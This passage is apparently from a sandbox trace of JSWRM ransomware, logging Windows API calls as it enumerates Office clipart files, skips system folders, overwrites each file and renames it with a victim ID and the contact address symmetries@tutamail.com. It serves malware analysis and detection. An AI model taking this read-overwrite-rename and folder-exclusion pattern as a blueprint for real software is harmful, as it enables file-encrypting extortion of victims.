lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107090.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107090.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107090.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107090.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107090.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0081.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.796] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14132) returned 1 [0081.796] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3730) returned 0x24d210 [0081.797] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3730, lpOverlapped=0x0) returned 1 [0081.799] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.799] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3730, lpOverlapped=0x0) returned 1 [0081.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.799] CloseHandle (hObject=0x314) returned 1 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0081.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0081.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.799] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0081.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.800] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107130.WMF", cAlternateFileName="")) returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2=".") returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="..") returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="...") returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="windows") returned -1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="recovery") returned -1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="perflogs") returned -1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="documents and settings") returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="system volume information") returned -1 [0081.800] lstrcmpiW (lpString1="J0107130.WMF", lpString2="msocache") returned -1 [0081.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0081.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107130.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107130.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107130.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0081.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0081.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107130.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107130.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107130.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0081.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27084) returned 1 [0081.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x69c0) returned 0x24d210 [0081.801] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x69c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x69c0, lpOverlapped=0x0) returned 1 [0081.804] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.804] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x69c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x69c0, lpOverlapped=0x0) returned 1 [0081.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.805] CloseHandle (hObject=0x314) returned 1 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0081.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0081.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0081.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0081.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.806] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbcfc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107132.WMF", cAlternateFileName="")) returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2=".") returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="..") returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="...") returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="windows") returned -1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="recovery") returned -1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="perflogs") returned -1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="documents and settings") returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="system volume information") returned -1 [0081.806] lstrcmpiW (lpString1="J0107132.WMF", lpString2="msocache") returned -1 [0081.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107132.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107132.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107132.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0081.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107132.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107132.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107132.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0081.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.807] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48380) returned 1 [0081.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbcf0) returned 0x24d210 [0081.807] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbcf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbcf0, lpOverlapped=0x0) returned 1 [0081.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.812] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbcf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbcf0, lpOverlapped=0x0) returned 1 [0081.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.813] CloseHandle (hObject=0x314) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0081.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0081.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0081.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0081.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0081.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0081.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0081.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.814] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107134.WMF", cAlternateFileName="")) returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2=".") returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="..") returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="...") returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="windows") returned -1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="recovery") returned -1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="perflogs") returned -1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="documents and settings") returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="system volume information") returned -1 [0081.814] lstrcmpiW (lpString1="J0107134.WMF", lpString2="msocache") returned -1 [0081.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0081.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107134.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107134.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107134.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0081.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107134.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107134.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107134.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.815] CreateFileW (lpFileName="C:\\Program 